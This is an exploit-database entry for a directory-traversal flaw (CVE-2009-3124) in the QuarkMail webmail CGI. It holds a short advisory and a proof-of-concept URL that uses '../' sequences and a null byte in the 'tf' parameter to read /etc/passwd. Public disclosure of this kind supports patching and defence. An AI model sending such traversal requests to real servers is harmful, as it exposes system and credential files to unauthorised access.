QuarkMail - 'tf' Directory Traversal
Author: Securitylab.ir type: webapps platform: php port: date_added: 2009-08-28 date_updated: 2014-10-03 verified: 1 codes: CVE-2009-3124;OSVDB-57911 tags: aliases: screenshot_url: application_url: raw file: 34875.txt
source: https://www.securityfocus.com/bid/44226/info QuarkMail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes